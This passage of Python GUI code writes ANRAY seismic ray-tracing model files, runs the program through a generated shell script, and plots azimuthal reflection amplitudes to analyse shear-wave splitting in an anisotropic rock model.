if self.checkBox_solo.isChecked():
file.write('%s %s\n' % (1.9, 2.1))
#especificação de parametros elásticos e densidade constante
file.write('%s %s\n' % (0, 1))
#densidades
if self.checkBox_solo.isChecked():
file.write('%s '% (self.solo_densidade.value() / 1000))
file.write('%s %s\n' % (self.spinBox_p1.value()/1000, self.spinBox_p2.value()/1000))
if self.checkBox_solo.isChecked():
file.write('%s %s\n' % (0, 0))
file.write('%s %s %s\n' % (1, 1, 1)) # homogenea em x,y,z
file.write('/\n/\n/\n') # gridlines
file.write('%s\n%s\n' % ((self.solo_vp.value() / 1000) ** 2, (self.solo_vs.value() / 1000) ** 2)) # quadrado da onda P e S
#camada isotrópica
file.write('%s %s\n' % (0, 0))
file.write('%s %s %s\n' % (1, 1, 1)) #homogenea em x,y,z
file.write('/\n/\n/\n') #gridlines
file.write('%s\n%s\n' % ((self.spinBox_vp1.value()/1000)**2, (self.spinBox_vs1.value()/1000)**2)) #quadrado da onda P e S
# camada anisotrópica
if self.dn and self.dt == 0:
file.write('%s %s\n' % (0, 0))
file.write('%s %s %s\n' % (1, 1, 1)) # homogenea em x,y,z
file.write('/\n/\n/\n') # gridlines
file.write('%s\n%s\n' % ((self.spinBox_vp2.value() / 1000) ** 2, (self.spinBox_vs2.value() / 1000) ** 2))
else:
file.write('%s %s\n' % (1, 0))
file.write('%s %s %s\n' % (1, 1, 1)) # homogenea em x,y,z
file.write('/\n/\n/\n') # gridlines
file.write('%s\n' % (self.c11)) #A11
file.write('%s\n' % (self.c13)) # A12
file.write('%s\n' % (self.c13)) # A13
file.write('%s\n' % (0)) # A14
file.write('%s\n' % (0)) # A15
file.write('%s\n' % (0)) # A16
file.write('%s\n' % (self.c33)) # A22
file.write('%s\n' % (self.c23)) # A23
file.write('%s\n' % (0)) # A24
file.write('%s\n' % (0)) # A25
file.write('%s\n' % (0)) # A26
file.write('%s\n' % (self.c33)) # A33
file.write('%s\n' % (0)) # A34
file.write('%s\n' % (0)) # A35
file.write('%s\n' % (0)) # A36
file.write('%s\n' % (self.c44)) # A44
file.write('%s\n' % (0)) # A45
file.write('%s\n' % (0)) # A46
file.write('%s\n' % (self.c55)) # A55
file.write('%s\n' % (0)) # A55
file.write('%s\n' % (self.c55)) # A66
#!ICONT,MEP,MOUT,MDIM,METHOD,MREG,ITMAX,IPOL,IPREC,IRAYPL,IPRINT,IAMP,MTRNS,ICOEF,IRT,ILOC,MCOD,MORI
file.write('%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s\n' % (1, self.spinBox_ngeo.value(), 1, 1, 0, 1, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1))
#!PROF(1),RMIN,RSTEP,XPRF,YPRF
if h < 90:
azh = (h/180)*np.pi
else:
azh = 1.5
file.write('%s %s %s %s %s\n' % (azh, self.spinBox_rmin.value()/1000, self.spinBox_rstep.value()/1000, 10, 10))
#!XSOUR,YSOUR,ZSOUR,TSOUR,DT,AC,REPS,PREPS
file.write('%s %s %s %s %s %s %s %s\n' % (10, 10, 0, 0, 0.04, 0.0001, 0.0005, 0.0005))
#!AMIN, ASTEP, AMAX
file.write('%s %s %s\n' % (-0.3, 0.005, 1.8))
#!BMIN, BSTEP, BMAX
file.write('%s %s %s\n' % (-0.3, 0.005, 1.8))
#!KC, KREF, ((CODE(I, K), K = 1, 2), I = 1, KREF)
file.write('%s %s %s %s %s %s\n' % (1, 2, 1, 3, 1, 1))
if self.checkBox_solo.isChecked():
file.write('%s %s %s %s %s %s %s %s %s %s\n' % (1, 4, 1, 3, 2, 3, 2, 1, 1, 1))
file.write('%s %s\n' % (0, 0))
file.write('%s/' % (0))
file.close()
self.anray_script(h)
#Função que constrói um script para rodar os modelos e gerar as figuras
def anray_script(self, azh):
files = open('anray_script%s.sh' %azh, 'w')
files.write('modname=modelo_anray\nanrayinput="$modname"_%s.modelo\n./anray <<FIM\n$anrayinput\nFIM\n\n\n' %(azh))
files.write('cp fort.30 amplitudes_%s.dat\n\n' %azh)
files.write('cp lu2.anray lu2_%s.anray' %azh)
files.close()
subprocess.call('chmod +x anray_script%s.sh' %azh, shell=True)
thread_anray = threading.Thread(target=self.anray_thr(azh))
thread_anray.start()
#Função para executar o script e aguardar o término da execução
def anray_thr(self, azh):
FNULL = open(os.devnull, 'w')
str = './anray_script%s.sh' %azh
p = subprocess.Popen(str, shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
status = p.wait()
shutil.copy2('fort.30', '%s/HTI_P_model/amplitudes_%s.dat' %(self.anray_path, azh))
shutil.copy2('lu2.anray', '%s/HTI_P_model/lu2_%s.anray' % (self.anray_path, azh))
shutil.move('modelo_anray_%s.modelo' % azh,'%s/HTI_P_model/modelo_anray_%s.modelo' % (self.anray_path, azh))
os.remove('%s/anray_script%s.sh' %(self.anray_path, azh))
self.size = self.size + 10
self.progressBar.setValue(self.size)
if self.progressBar.value() == 100:
self.frame_7.setEnabled(True)
self.frame_8.setEnabled(True)
self.frame_11.setEnabled(True)
self.frame_13.setEnabled(True)
self.sismo_button.setEnabled(True)
self.frame_14.setEnabled(True)
self.frame_9.setEnabled(True)
if self.checkBox_solo.isChecked() == False:
self.checkBox_solo_sismo.setChecked(False)
self.checkBox_solo_sismo2.setChecked(False)
self.checkBox_solo_sismo.setEnabled(False)
self.frame_12.setEnabled(False)
self.label_47.setEnabled(False)
else:
self.frame_12.setEnabled(True)
self.checkBox_solo_sismo.setEnabled(True)
self.label_47.setEnabled(True)
self.split()
#Função que plota as componentes a partir do anray e analisa a separação
def split(self):
self.axes_anray_tot.cla()
self.axes_anray_tot2.cla()
self.axes_anray_rad.cla()
self.axes_anray_rad2.cla()
self.axes_anray_z.cla()
self.axes_anray_z2.cla()
self.axes_anray_time.cla()
self.axes_anray2_tot.cla()
self.axes_anray2_z.cla()
self.axes_anray2_time.cla()
self.axes_anray2_rad.cla()
f_0 = open('amplitudes_0.dat', "r")
f_30 = open('amplitudes_30.dat', "r")
f_45 = open('amplitudes_45.dat', "r")
f_60 = open('amplitudes_60.dat', "r")
f_90= open('amplitudes_90.dat', "r")
time_basalto = []
time_solo=[]
geofone_0 = []
x_0 = []
y_0 = []
z_0 = []
xc_0 = []
yc_0 = []
zc_0 = []
geofone_30 = []
x_30 = []
y_30 = []
z_30 = []
xc_30 = []
yc_30 = []
zc_30 = []
geofone_45 = []
x_45 = []
y_45 = []
z_45 = []
xc_45 = []
yc_45 = []
zc_45 = []
geofone_60 = []
x_60 = []
y_60 = []
z_60 = []
xc_60 = []
yc_60 = []
zc_60 = []
geofone_90 = []
x_90 = []
y_90 = []
z_90 = []
xc_90 = []
yc_90 = []
zc_90 = []
solo_x_0=[]
solo_x_30=[]
solo_x_45 = []
solo_x_60 = []
solo_x_90 = []
solo_y_0=[]
solo_y_30=[]
solo_y_45 = []
solo_y_60 = []
solo_y_90 = []
solo_z_0=[]
solo_z_30=[]
solo_z_45 = []
solo_z_60 = []
solo_z_90 = []
fase_x_0 = []
fase_x_30 = []
fase_x_45 = []
fase_x_60 = []
fase_x_90 = []
fase_y_0 = []
fase_y_30 = []
fase_y_45 = []
fase_y_60 = []
fase_y_90 = []
fase_z_0 = []
fase_z_30 = []
fase_z_45 = []
fase_z_60 = []
fase_z_90 = []
self.axes_anray_tot.set_ylabel("total")
self.axes_anray_rad.set_ylabel("radial")
self.axes_anray_z.set_ylabel("vertical")
self.axes_anray_tot.grid()
self.axes_anray_rad.grid()
self.axes_anray_z.grid()
self.axes_anray_time.grid()
self.axes_anray2_tot.set_ylabel("total")
self.axes_anray2_rad.set_ylabel("radial")
self.axes_anray2_z.set_ylabel("vertical")
self.axes_anray2_tot.grid()
self.axes_anray2_rad.grid()
self.axes_anray2_z.grid()
self.axes_anray2_time.grid()
if self.checkBox_solo.isChecked():
two_layer = True
var = 2
else:
two_layer = False
var = 1
for line in f_0:
coluna = line.split()
if float(coluna[0]) == var:
geofone_0.append(int(coluna[1]))
#parte real
x_0.append(float(coluna[3]))
y_0.append(float(coluna[5]))
z_0.append(float(coluna[7]))
#parte complexa
xc_0.append(float(coluna[4]))
yc_0.append(float(coluna[6]))
zc_0.append(float(coluna[8]))
if two_layer == True:
if float(coluna[0]) == 2:
time_basalto.append(float(coluna[2]))
else :
time_solo.append(float(coluna[2]))
solo_x_0.append(np.sqrt(float(coluna[3])**2+float(coluna[4])**2))
solo_y_0.append(np.sqrt(float(coluna[5]) ** 2 + float(coluna[6]) ** 2))
solo_z_0.append(np.sqrt(float(coluna[7]) ** 2 + float(coluna[8]) ** 2))
fase_x_0.append(np.arctan2(float(coluna[4]), float(coluna[3])))
fase_y_0.append(np.arctan2(float(coluna[6]), float(coluna[5])))
fase_z_0.append(np.arctan2(float(coluna[8]), float(coluna[7])))
if two_layer == False:
time_basalto.append(float(coluna[2]))
f_0.close()
geo_0 = np.asarray(geofone_0)
time_basalto = np.asarray(time_basalto)
time_solo = np.asarray(time_solo)
x_0 = np.asarray(x_0)
y_0 = np.asarray(y_0)
z_0 = np.asarray(z_0)
xc_0 = np.asarray(xc_0)
yc_0 = np.asarray(yc_0)
zc_0 = np.asarray(zc_0)
solo_x_0 = np.asarray(solo_x_0)
solo_x_0 = np.fliplr([solo_x_0])[0]
solo_y_0 = np.asarray(solo_y_0)
solo_y_0 = np.fliplr([solo_y_0])[0]
solo_z_0 = np.asarray(solo_z_0)
solo_z_0 = np.fliplr([solo_z_0])[0]
fase_x_0 = np.asarray(fase_x_0)
fase_x_0 = np.fliplr([fase_x_0])[0]
fase_y_0 = np.asarray(fase_y_0)
fase_y_0 = np.fliplr([fase_y_0])[0]
fase_z_0 = np.asarray(fase_z_0)
fase_z_0 = np.fliplr([fase_z_0])[0]
solo_rad_0 = np.sqrt(solo_x_0 ** 2 + solo_y_0 ** 2)
self.solo_fase_rad = fase_x_0
self.solo_fase_z = fase_z_0
solo_0_tot = np.sqrt(solo_x_0 ** 2 + solo_y_0 ** 2 + solo_z_0 ** 2)
self.refl_solo_rad_0 = solo_rad_0
self.refl_solo_z_0 = solo_z_0
self.time_basalto = np.fliplr([time_basalto])[0]
self.time_solo = np.fliplr([time_solo])[0]
x0_re = np.fliplr([x_0])[0]
y0_re = np.fliplr([y_0])[0]
z0_re = np.fliplr([z_0])[0]
x0c_re = np.fliplr([xc_0])[0]
y0c_re = np.fliplr([yc_0])[0]
z0c_re = np.fliplr([zc_0])[0]
ampx_0 = np.sqrt(x0_re**2 + x0c_re**2)
ampy_0 = np.sqrt(y0_re **2 + y0c_re ** 2)
ampz_0 = np.sqrt(z0_re **2 + z0c_re ** 2)
phx_0 = np.arctan2(x0c_re, x0_re)
phy_0 = np.arctan2(y0c_re, y0_re)
phz_0 = np.arctan2(z0c_re, z0_re)
self.hti_fase_rad_0 = phx_0
self.hti_fase_z_0 = phz_0
geo0_re = np.fliplr([geo_0])[0]
tot0 = np.sqrt(ampx_0 ** 2 + ampy_0 ** 2 + ampz_0 ** 2)
rad_0 = np.sqrt(ampx_0 ** 2 + ampy_0 ** 2)
self.axes_anray_tot.plot(geo0_re, tot0, label=0)
self.refl_tot_0 = tot0
self.refl_rad_0 = rad_0
self.refl_z_0 = ampz_0
self.axes_anray_z.plot(geo0_re, ampz_0, label=0)
self.axes_anray_rad.plot(geo0_re, rad_0, label=0)
try:
if two_layer==True:
self.axes_anray2_tot.plot(geo0_re, solo_0_tot, label=0)
self.axes_anray2_rad.plot(geo0_re, solo_rad_0, label=0)
self.axes_anray2_z.plot(geo0_re, solo_z_0, label=0)
if two_layer == True:
self.axes_anray_time.plot(geo0_re, self.time_basalto, color='blue')
self.axes_anray2_time.plot(geo0_re, self.time_solo, color='brown')
else:
self.axes_anray_time.plot(geo0_re, self.time_basalto, color='blue')
self.axes_anray_time.set_ylabel('tempo (s)')
self.axes_anray2_time.set_ylabel('tempo (s)')
for line in f_30:
coluna = line.split()
if float(coluna[0]) == var:
geofone_30.append(int(coluna[1]))
x_30.append(float(coluna[3]))
y_30.append(float(coluna[5]))
z_30.append(float(coluna[7]))
xc_30.append(float(coluna[4]))
yc_30.append(float(coluna[6]))
zc_30.append(float(coluna[8]))
if two_layer == True:
if float(coluna[0]) == 1:
solo_x_30.append(np.sqrt(float(coluna[3])**2+float(coluna[4])**2))
solo_y_30.append(np.sqrt(float(coluna[5]) ** 2 + float(coluna[6]) ** 2))
solo_z_30.append(np.sqrt(float(coluna[7]) ** 2 + float(coluna[8]) ** 2))
fase_x_30.append(np.arctan2(float(coluna[4]), float(coluna[3])))
fase_y_30.append(np.arctan2(float(coluna[6]), float(coluna[5])))
fase_z_30.append(np.arctan2(float(coluna[8]), float(coluna[7])))
f_30.close()
geo_30 = np.asarray(geofone_30)
x_30 = np.asarray(x_30)
y_30 = np.asarray(y_30)
z_30 = np.asarray(z_30)
xc_30 = np.asarray(xc_30)
yc_30 = np.asarray(yc_30)
zc_30 = np.asarray(zc_30)
x30_re = np.fliplr([x_30])[0]
y30_re = np.fliplr([y_30])[0]
z30_re = np.fliplr([z_30])[0]
x30c_re = np.fliplr([xc_30])[0]
y30c_re = np.fliplr([yc_30])[0]
z30c_re = np.fliplr([zc_30])[0]
ampx_30 = np.sqrt(x30_re ** 2 + x30c_re ** 2)
ampy_30 = np.sqrt(y30_re ** 2 + y30c_re ** 2)
ampz_30 = np.sqrt(z30_re ** 2 + z30c_re ** 2)
phx_30 = np.arctan2(x30c_re, x30_re)
phy_30 = np.arctan2(y30c_re, y30_re)
phz_30 = np.arctan2(z30c_re, z30_re)
self.hti_fase_rad_30 = phx_30
self.hti_fase_z_30 = phz_30
geo30_re = np.fliplr([geo_30])[0]
tot30 = np.sqrt(ampx_30 ** 2 + ampy_30 ** 2 + ampz_30 ** 2)
rad_30 = np.sqrt(ampx_30 ** 2 + ampy_30 ** 2)
solo_x_30 = np.asarray(solo_x_30)
solo_x_30 = np.fliplr([solo_x_30])[0]
solo_y_30 = np.asarray(solo_y_30)
solo_y_30 = np.fliplr([solo_y_30])[0]
solo_z_30 = np.asarray(solo_z_30)
solo_z_30 = np.fliplr([solo_z_30])[0]
solo_30_tot = np.sqrt(solo_x_30 ** 2 + solo_y_30 ** 2 + solo_z_30 ** 2)
solo_rad_30 = np.sqrt(solo_x_30 ** 2 + solo_y_30 ** 2)
fase_x_30 = np.asarray(fase_x_30)
fase_x_30 = np.fliplr([fase_x_30])[0]
fase_y_30 = np.asarray(fase_y_30)
fase_y_30 = np.fliplr([fase_y_30])[0]
fase_z_30 = np.asarray(fase_z_30)
fase_z_30 = np.fliplr([fase_z_30])[0]
self.refl_solo_x_30 = solo_rad_30
self.refl_solo_y_30 = solo_y_30
self.refl_solo_z_30 = solo_z_30
self.refl_tot_30 = tot30
self.refl_rad_30 = rad_30
self.refl_y_30 = y30_re
self.refl_z_30 = ampz_30
self.axes_anray_tot.plot(geo30_re, tot30, label=30)
self.axes_anray_rad.plot(geo30_re, rad_30, label=30)
self.axes_anray_z.plot(geo30_re, ampz_30, label=30)
if two_layer == True:
self.axes_anray2_z.plot(geo30_re, solo_z_30, label=30)
self.axes_anray2_tot.plot(geo30_re, solo_30_tot, label=30)
self.axes_anray2_rad.plot(geo30_re, solo_rad_30, label=30)
for line in f_45:
coluna = line.split()
if float(coluna[0]) == var:
geofone_45.append(int(coluna[1]))
x_45.append(float(coluna[3]))
y_45.append(float(coluna[5]))
z_45.append(float(coluna[7]))
xc_45.append(float(coluna[4]))
yc_45.append(float(coluna[6]))
zc_45.append(float(coluna[8]))
if two_layer == True:
if float(coluna[0]) == 1:
solo_x_45.append(np.sqrt(float(coluna[3])**2+float(coluna[4])**2))
solo_y_45.append(np.sqrt(float(coluna[5]) ** 2 + float(coluna[6]) ** 2))
solo_z_45.append(np.sqrt(float(coluna[7]) ** 2 + float(coluna[8]) ** 2))
fase_x_45.append(np.arctan2(float(coluna[4]), float(coluna[3])))
fase_y_45.append(np.arctan2(float(coluna[6]), float(coluna[5])))
fase_z_45.append(np.arctan2(float(coluna[8]), float(coluna[7])))
f_45.close()
geo_45 = np.asarray(geofone_45)
x_45 = np.asarray(x_45)
y_45 = np.asarray(y_45)
z_45 = np.asarray(z_45)
xc_45 = np.asarray(xc_45)
yc_45 = np.asarray(yc_45)
zc_45 = np.asarray(zc_45)
x45_re = np.fliplr([x_45])[0]
y45_re = np.fliplr([y_45])[0]
z45_re = np.fliplr([z_45])[0]
x45c_re = np.fliplr([xc_45])[0]
y45c_re = np.fliplr([yc_45])[0]
z45c_re = np.fliplr([zc_45])[0]
ampx_45 = np.sqrt(x45_re ** 2 + x45c_re ** 2)
ampy_45 = np.sqrt(y45_re ** 2 + y45c_re ** 2)
ampz_45 = np.sqrt(z45_re ** 2 + z45c_re ** 2)
phx_45 = np.arctan2(x45c_re, x45_re)
phy_45 = np.arctan2(y45c_re, y45_re)
phz_45 = np.arctan2(z45c_re, z45_re)
self.hti_fase_rad_45 = phx_45
self.hti_fase_z_45 = phz_45
geo45_re = np.fliplr([geo_45])[0]
tot45 = np.sqrt(ampx_45 ** 2 + ampy_45 ** 2 + ampz_45 ** 2)
rad_45 = np.sqrt(ampx_45 ** 2 + ampy_45 ** 2)
solo_x_45 = np.asarray(solo_x_45)
solo_x_45 = np.fliplr([solo_x_45])[0]
solo_y_45 = np.asarray(solo_y_45)
solo_y_45 = np.fliplr([solo_y_45])[0]
solo_z_45 = np.asarray(solo_z_45)
solo_z_45 = np.fliplr([solo_z_45])[0]
solo_45_tot = np.sqrt(solo_x_45 ** 2 + solo_y_45 ** 2 + solo_z_45 ** 2)
solo_rad_45 = np.sqrt(solo_x_45 ** 2 + solo_y_45 ** 2)
fase_x_45 = np.asarray(fase_x_45)
fase_x_45 = np.fliplr([fase_x_45])[0]
fase_y_45 = np.asarray(fase_y_45)
fase_y_45 = np.fliplr([fase_y_45])[0]
fase_z_45 = np.asarray(fase_z_45)
fase_z_45 = np.fliplr([fase_z_45])[0]
self.refl_solo_x_45 = solo_rad_45
self.refl_solo_y_45 = solo_y_45
self.refl_solo_z_45 = solo_z_45
self.refl_tot_45 = tot45
self.refl_rad_45 = rad_45
self.refl_y_45 = y45_re
self.refl_z_45 = ampz_45
self.axes_anray_tot.plot(geo45_re, tot45, label=45)
self.axes_anray_rad.plot(geo45_re, rad_45, label=45)
self.axes_anray_z.plot(geo45_re, ampz_45, label=45)
if two_layer == True:
self.axes_anray2_z.plot(geo45_re, solo_z_45, label=45)
self.axes_anray2_tot.plot(geo45_re, solo_45_tot, label=45)
self.axes_anray2_rad.plot(geo45_re, solo_rad_45, label=45)
for line in f_60:
coluna = line.split()
if float(coluna[0]) == var:
geofone_60.append(int(coluna[1]))
x_60.append(float(coluna[3]))
y_60.append(float(coluna[5]))
z_60.append(float(coluna[7]))
xc_60.append(float(coluna[4]))
yc_60.append(float(coluna[6]))
zc_60.append(float(coluna[8]))
if two_layer == True:
if float(coluna[0]) == 1:
solo_x_60.append(np.sqrt(float(coluna[3])**2+float(coluna[4])**2))
solo_y_60.append(np.sqrt(float(coluna[5]) ** 2 + float(coluna[6]) ** 2))
solo_z_60.append(np.sqrt(float(coluna[7]) ** 2 + float(coluna[8]) ** 2))
fase_x_60.append(np.arctan2(float(coluna[4]), float(coluna[3])))
fase_y_60.append(np.arctan2(float(coluna[6]), float(coluna[5])))
fase_z_60.append(np.arctan2(float(coluna[8]), float(coluna[7])))
f_60.close()
geo_60 = np.asarray(geofone_60)
x_60 = np.asarray(x_60)
y_60 = np.asarray(y_60)
z_60 = np.asarray(z_60)
xc_60 = np.asarray(xc_60)
yc_60 = np.asarray(yc_60)
zc_60 = np.asarray(zc_60)
x60_re = np.fliplr([x_60])[0]
y60_re = np.fliplr([y_60])[0]
z60_re = np.fliplr([z_60])[0]
x60c_re = np.fliplr([xc_60])[0]
y60c_re = np.fliplr([yc_60])[0]
z60c_re = np.fliplr([zc_60])[0]
ampx_60 = np.sqrt(x60_re ** 2 + x60c_re ** 2)
ampy_60 = np.sqrt(y60_re ** 2 + y60c_re ** 2)
ampz_60 = np.sqrt(z60_re ** 2 + z60c_re ** 2)
phx_60 = np.arctan2(x60c_re, x60_re)
phy_60 = np.arctan2(y60c_re, y60_re)
phz_60 = np.arctan2(z60c_re, z60_re)
self.hti_fase_rad_60 = phx_60
self.hti_fase_z_60 = phz_60
geo60_re = np.fliplr([geo_60])[0]
tot60 = np.sqrt(ampx_60 ** 2 + ampy_60 ** 2 + ampz_60 ** 2)
rad_60 = np.sqrt(ampx_60 ** 2 + ampy_60 ** 2)
solo_x_60 = np.asarray(solo_x_60)
solo_x_60 = np.fliplr([solo_x_60])[0]
solo_y_60 = np.asarray(solo_y_60)
solo_y_60 = np.fliplr([solo_y_60])[0]
solo_z_60 = np.asarray(solo_z_60)
solo_z_60 = np.fliplr([solo_z_60])[0]
solo_60_tot = np.sqrt(solo_x_60 ** 2 + solo_y_60 ** 2 + solo_z_60 ** 2)
solo_rad_60 = np.sqrt(solo_x_60 ** 2 + solo_y_60 ** 2)
fase_x_60 = np.asarray(fase_x_60)
fase_x_60 = np.fliplr([fase_x_60])[0]
fase_y_60 = np.asarray(fase_y_60)
fase_y_60 = np.fliplr([fase_y_60])[0]
fase_z_60 = np.asarray(fase_z_60)
fase_z_60 = np.fliplr([fase_z_60])[0]
self.refl_solo_x_60 = solo_rad_60
self.refl_solo_y_60 = solo_y_60
self.refl_solo_z_60 = solo_z_60
self.refl_tot_60 = tot60
self.refl_rad_60 = rad_60
self.refl_y_60 = y60_re
self.refl_z_60 = ampz_60
self.axes_anray_tot.plot(geo60_re, tot60, label=60)
self.axes_anray_rad.plot(geo60_re, rad_60, label=60)
self.axes_anray_z.plot(geo60_re, ampz_60, label=60)
if two_layer == True:
self.axes_anray2_z.plot(geo60_re, solo_z_60, label=60)
self.axes_anray2_tot.plot(geo60_re, solo_60_tot, label=60)
self.axes_anray2_rad.plot(geo60_re, solo_rad_60, label=60)
for line in f_90:
coluna = line.split()
if float(coluna[0]) == var:
geofone_90.append(int(coluna[1]))
x_90.append(float(coluna[3]))
y_90.append(float(coluna[5]))
z_90.append(float(coluna[7]))
xc_90.append(float(coluna[4]))
yc_90.append(float(coluna[6]))
zc_90.append(float(coluna[8]))
if two_layer == True:
if float(coluna[0]) == 1:
solo_x_90.append(np.sqrt(float(coluna[3])**2+float(coluna[4])**2))
solo_y_90.append(np.sqrt(float(coluna[5]) ** 2 + float(coluna[6]) ** 2))
solo_z_90.append(np.sqrt(float(coluna[7]) ** 2 + float(coluna[8]) ** 2))
fase_x_90.append(np.arctan2(float(coluna[4]), float(coluna[3])))
fase_y_90.append(np.arctan2(float(coluna[6]), float(coluna[5])))
fase_z_90.append(np.arctan2(float(coluna[8]), float(coluna[7])))
f_90.close()
geo_90 = np.asarray(geofone_90)
x_90 = np.asarray(x_90)
y_90 = np.asarray(y_90)
z_90 = np.asarray(z_90)
xc_90 = np.asarray(xc_90)
yc_90 = np.asarray(yc_90)
zc_90 = np.asarray(zc_90)
x90_re = np.fliplr([x_90])[0]
y90_re = np.fliplr([y_90])[0]
z90_re = np.fliplr([z_90])[0]
x90c_re = np.fliplr([xc_90])[0]
y90c_re = np.fliplr([yc_90])[0]
z90c_re = np.fliplr([zc_90])[0]
ampx_90 = np.sqrt(x90_re ** 2 + x90c_re ** 2)
ampy_90 = np.sqrt(y90_re ** 2 + y90c_re ** 2)
ampz_90 = np.sqrt(z90_re ** 2 + z90c_re ** 2)
phx_90 = np.arctan2(x60c_re, x60_re)
phy_90 = np.arctan2(y60c_re, y60_re)
phz_90 = np.arctan2(z60c_re, z60_re)
self.hti_fase_rad_90 = phx_90
self.hti_fase_z_90 = phz_90
geo90_re = np.fliplr([geo_90])[0]
tot90 = np.sqrt(ampx_90 ** 2 + ampy_90 ** 2 + ampz_90 ** 2)
rad_90 = np.sqrt(ampx_90 ** 2 + ampy_90 ** 2)
solo_x_90 = np.asarray(solo_x_90)
solo_x_90 = np.fliplr([solo_x_90])[0]
solo_y_90 = np.asarray(solo_y_90)
solo_y_90 = np.fliplr([solo_y_90])[0]
solo_z_90 = np.asarray(solo_z_90)
solo_z_90 = np.fliplr([solo_z_90])[0]
solo_90_tot = np.sqrt(solo_x_90 ** 2 + solo_y_90 ** 2 + solo_z_90 ** 2)
solo_rad_90 = np.sqrt(solo_x_90 ** 2 + solo_y_90 ** 2)
fase_x_90 = np.asarray(fase_x_90)
fase_x_90 = np.fliplr([fase_x_90])[0]
fase_y_90 = np.asarray(fase_y_90)
fase_y_90 = np.fliplr([fase_y_90])[0]
fase_z_90 = np.asarray(fase_z_90)
fase_z_90 = np.fliplr([fase_z_90])[0]
self.refl_solo_x_90 = solo_rad_90
self.refl_solo_y_90 = solo_y_90
self.refl_solo_z_90 = solo_z_90
self.refl_tot_90 = tot90
self.refl_rad_90 = rad_90
self.refl_y_90 = y90_re
self.refl_z_90 = ampz_90
self.axes_anray_tot.plot(geo90_re, tot90, label=90)
self.axes_anray_rad.plot(geo90_re, rad_90, label=90)
self.axes_anray_z.plot(geo90_re, ampz_90, label=90)
self.axes_anray_tot.legend(title='Azimute', fontsize=6, loc=2, ncol=5, bbox_to_anchor=(0, 1.5))
if two_layer == True:
self.axes_anray2_z.plot(geo90_re, solo_z_90, label=90)
self.axes_anray2_tot.plot(geo90_re, solo_90_tot, label=90)
self.axes_anray2_rad.plot(geo90_re, solo_rad_90, label=90)
self.axes_anray2_tot.legend(title='Azimute', fontsize=6, loc=2, ncol=5, bbox_to_anchor=(0, 1.4))
if self.split_box_anray_0_90.isChecked():
split_tot = np.zeros(len(geo0_re))
split_rad = np.zeros(len(geo0_re))
split_z = np.zeros(len(geo0_re))
for i in range(len(geo0_re)):
if tot0[i] > tot90[i]:
split_tot[i] = (tot0[i]-tot90[i])/tot90[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo0_re[i], tot0[i], 'r+')
self.axes_anray_tot.plot(geo0_re[i], tot90[i], 'r+')
else:
split_tot[i] = (tot90[i] - tot0[i]) / tot0[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo0_re[i], tot0[i], 'r+')
self.axes_anray_tot.plot(geo0_re[i], tot90[i], 'r+')
if abs(rad_0[i]) > abs(rad_90[i]):
split_rad[i] = (abs(rad_0[i])-abs(rad_90[i]))/abs(rad_90[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo0_re[i], rad_0[i], 'r+')
self.axes_anray_rad.plot(geo0_re[i], rad_90[i], 'r+')
else:
split_rad[i] = (abs(rad_90[i]) - abs(rad_0[i])) / abs(rad_0[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo0_re[i], rad_0[i], 'r+')
self.axes_anray_rad.plot(geo0_re[i], rad_90[i], 'r+')
if abs(ampz_0[i]) > abs(ampz_90[i]):
split_z[i] = (abs(ampz_0[i])-abs(ampz_90[i]))/abs(ampz_90[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo0_re[i], ampz_0[i], 'r+')
self.axes_anray_z.plot(geo0_re[i], ampz_90[i], 'r+')
else:
split_z[i] = (abs(ampz_90[i]) - abs(ampz_0[i])) / abs(ampz_0[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo0_re[i], ampz_0[i], 'r+')
self.axes_anray_z.plot(geo0_re[i], ampz_90[i], 'r+')
self.axes_anray_tot2.bar(geo0_re, split_tot, width=0.7, alpha=0.1, color='red')
self.axes_anray_rad2.bar(geo0_re, split_rad, width=0.7, alpha=0.1, color='red')
self.axes_anray_z2.bar(geo0_re, split_z, width=0.7, alpha=0.1, color='red')
if self.split_box_anray_0_45.isChecked():
split_tot = np.zeros(len(geo45_re))
split_rad = np.zeros(len(geo45_re))
split_z = np.zeros(len(geo45_re))
for i in range(len(geo45_re)):
if tot0[i] > tot45[i]:
split_tot[i] = (tot0[i] - tot45[i]) / tot45[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo45_re[i], tot0[i], 'b+')
self.axes_anray_tot.plot(geo45_re[i], tot45[i], 'b+')
else:
split_tot[i] = (tot45[i] - tot0[i]) / tot0[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo45_re[i], tot0[i], 'b+')
self.axes_anray_tot.plot(geo45_re[i], tot45[i], 'b+')
if abs(rad_0[i]) > abs(rad_45[i]):
split_rad[i] = (abs(rad_0[i]) - abs(rad_45[i])) / abs(rad_45[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo45_re[i], rad_0[i], 'b+')
self.axes_anray_rad.plot(geo45_re[i], rad_45[i], 'b+')
else:
split_rad[i] = (abs(rad_45[i]) - abs(rad_0[i])) / abs(rad_0[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo45_re[i], rad_0[i], 'b+')
self.axes_anray_rad.plot(geo45_re[i], rad_45[i], 'b+')
if abs(ampz_0[i]) > abs(ampz_45[i]):
split_z[i] = (abs(ampz_0[i]) - abs(ampz_45[i])) / abs(ampz_45[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo45_re[i], ampz_0[i], 'b+')
self.axes_anray_z.plot(geo45_re[i], ampz_45[i], 'b+')
else:
split_z[i] = (abs(ampz_45[i]) - abs(ampz_0[i])) / abs(ampz_0[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo45_re[i], ampz_0[i], 'b+')
self.axes_anray_z.plot(geo45_re[i], ampz_45[i], 'b+')
self.axes_anray_tot2.bar(geo45_re, split_tot, width=0.7, alpha=0.1, color='blue')
self.axes_anray_rad2.bar(geo45_re, split_rad, width=0.7, alpha=0.1, color='blue')
self.axes_anray_z2.bar(geo45_re, split_z, width=0.7, alpha=0.1, color='blue')
if self.split_box_anray_30_60.isChecked():
split_tot = np.zeros(len(geo30_re))
